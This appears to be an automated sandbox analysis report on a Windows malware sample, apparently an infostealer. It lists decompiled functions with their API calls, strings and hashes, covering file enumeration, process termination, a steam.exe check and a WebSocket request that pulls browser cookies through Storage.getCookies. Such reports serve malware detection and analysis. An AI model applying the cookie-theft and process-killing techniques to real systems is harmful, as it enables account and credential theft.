                        Function 0091D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0091D54D
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091D564
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091D584
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091D59E
                        • lstrcat.KERNEL32(?,015F01A8), ref: 0091D5E3
                        • lstrcat.KERNEL32(?,015F01C8), ref: 0091D5F7
                        • lstrcat.KERNEL32(?,?), ref: 0091D60B
                        • lstrcat.KERNEL32(?,?), ref: 0091D61C
                        • lstrcat.KERNEL32(?,00931794), ref: 0091D62E
                        • lstrcat.KERNEL32(?,?), ref: 0091D642
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091D682
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091D6D2
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091D737
                        • FindClose.KERNEL32(00000000), ref: 0091D746
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 50252434-4073750446
                        • Opcode ID: 2dcebbab5a0e577bbb57a4771141bce0c84b7754837c14cb98d69452a119ce66
                        • Instruction ID: afe3570da637aabfd2039a2112063cd18cd4f16560669e9caf766bbabaee7b7a
                        • Opcode Fuzzy Hash: 2dcebbab5a0e577bbb57a4771141bce0c84b7754837c14cb98d69452a119ce66
                        • Instruction Fuzzy Hash: 09615471A102199FCB24EF74DD88ADE77B9EF88300F1045A5F549A7291DF34AA84CF90
                        Function 009248B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                        • API String ID: 909987262-758292691
                        • Opcode ID: d157d18dab61f47a8cbdffe537fa61fdfafbe1fd7dada5f8456222d986abf866
                        • Instruction ID: bae521129b9b953cb3e8f47c9c03f43c0105376d53f44b336c2c81c78bd8b49a
                        • Opcode Fuzzy Hash: d157d18dab61f47a8cbdffe537fa61fdfafbe1fd7dada5f8456222d986abf866
                        • Instruction Fuzzy Hash: 74A26971E012699FDF20DFA8D8407EDBBB6BF88300F1585A9E518A7285DB705E85CF90
                        Function 009123A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009123D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009123F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00912402
                        • lstrlen.KERNEL32(\*.*), ref: 0091240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00912436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00912486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 7b1a7e81fb6d8a513b9becf7f1c9fb2e03bcd13d8b283b02e0ce0f5ac1d13ecf
                        • Instruction ID: b30fc1c6497316f6af7ea81225365a93369921b7e49aa5a98da68c9dbf05ea2b
                        • Opcode Fuzzy Hash: 7b1a7e81fb6d8a513b9becf7f1c9fb2e03bcd13d8b283b02e0ce0f5ac1d13ecf
                        • Instruction Fuzzy Hash: 6F414C317116199FCB22FF28DE89BDE77A9AF94304F145124B85AA72E1CF70DC498B90
                        Function 009246A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009246B9
                        • Process32First.KERNEL32(00000000,00000128), ref: 009246C9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 009246DB
                        • StrCmpCA.SHLWAPI(?,?), ref: 009246ED
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00924702
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00924711
                        • CloseHandle.KERNEL32(00000000), ref: 00924718
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00924726
                        • CloseHandle.KERNEL32(00000000), ref: 00924731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 578104d2fc6d019a614686f01fb3b469353ba22088de469354737db600b205e1
                        • Instruction ID: 01086f1256b4677c52778b9fa58dcefcc0078317592c4354cf69bf9f1e1e1469
                        • Opcode Fuzzy Hash: 578104d2fc6d019a614686f01fb3b469353ba22088de469354737db600b205e1
                        • Instruction Fuzzy Hash: 86018C31601224ABE7215B60EC8DFFE3B7CEB49B51F100198F909D7194EFB499848F65
                        Function 00924610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00924628
                        • Process32First.KERNEL32(00000000,00000128), ref: 00924638
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0092464A
                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00924660
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00924672
                        • CloseHandle.KERNEL32(00000000), ref: 0092467D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                        • String ID: steam.exe
                        • API String ID: 2284531361-2826358650
                        • Opcode ID: a08e3ab881b3a83efddb8401ae1e6780ab5657e4289aeb2a2382fef7baa81dcd
                        • Instruction ID: 594bc9772280858a38aff3bec0bac16a5ab6a69b66b8303b302267ba9eadf8bc
                        • Opcode Fuzzy Hash: a08e3ab881b3a83efddb8401ae1e6780ab5657e4289aeb2a2382fef7baa81dcd
                        • Instruction Fuzzy Hash: 330162716012249BE7209B60AC89FEE77BCEF09750F0401D5F908D2040EFB499948BE5
                        Function 00914B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914B7F
                        • lstrlen.KERNEL32(00934CA8), ref: 00914B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BA7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 00914BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00914BFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID:
                        • API String ID: 2567437900-0
                        • Opcode ID: 871285b995a095743fbfeb2cae03f2973f76e7657637a1ff0fd7f2899cfe94f6
                        • Instruction ID: 9c08961cfcb05a5a873c4182da27c9255636d54d762f80878c456e3704d94009
                        • Opcode Fuzzy Hash: 871285b995a095743fbfeb2cae03f2973f76e7657637a1ff0fd7f2899cfe94f6
                        • Instruction Fuzzy Hash: EB313B3172551A9FCB22EF68EE89BDE77B9AF94300F101124F816A7291CF70EC458B91
                        Function 00922D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00922D9B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00922DAD
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00922DBA
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00922DEC
                        • LocalFree.KERNEL32(00000000), ref: 00922FCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 3ca322328071fb69cda4c0f4e0f547bac6a37b7ad52699d64e0ff1596dcd1203
                        • Instruction ID: 212f0d9072c37fc32816dcd4d2973e9cd0acfc4c1b214268468e7c10cfafde5f
                        • Opcode Fuzzy Hash: 3ca322328071fb69cda4c0f4e0f547bac6a37b7ad52699d64e0ff1596dcd1203
                        • Instruction Fuzzy Hash: 07B13C71900224DFC715CF18E948B99B7F5FF44324F2AC1A9D409AB2AAD7769C82DF90
                        Function 00CB2DE7 Relevance: 10.4, Strings: 7, Instructions: 1631COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8EI?$Aas$caFz$n@~$qm?$r>)$)N
                        • API String ID: 0-2607675103
                        • Opcode ID: 4d354f86efc43e5cca99af830a3a93832f9a0b409128cf68f0099c4323943484
                        • Instruction ID: 55cd534e84ef2d80a1bfc12253e3cb1121906b52cf92de7a04ee7a49e44bfb59
                        • Opcode Fuzzy Hash: 4d354f86efc43e5cca99af830a3a93832f9a0b409128cf68f0099c4323943484
                        • Instruction Fuzzy Hash: CCB2E3F360C2049FE304AE2DEC8567ABBE9EF94320F16493DE6C5C7744EA3598418697
                        Function 00CBD164 Relevance: 10.3, Strings: 7, Instructions: 1531COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7Ew}$8=_$TnO?$Xv|$a~?u$W}w$ilK
                        • API String ID: 0-3619895878
                        • Opcode ID: 743a9d8d6be17e0e01001d614686826b846ebe71d9fa47c20c98142aa7aa56c2
                        • Instruction ID: d4a0062ba2bb0c5bfaaba9ab0bc587c9e4d7c02a67c8c35b1f0fea6e3543778b
                        • Opcode Fuzzy Hash: 743a9d8d6be17e0e01001d614686826b846ebe71d9fa47c20c98142aa7aa56c2
                        • Instruction Fuzzy Hash: 6CA2F7F3A0C2009FE7046E2DEC8567ABBE5EF94720F1A493DE6C5C7744EA3598018796
                        Function 00CBB4FE Relevance: 9.1, Strings: 6, Instructions: 1642COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
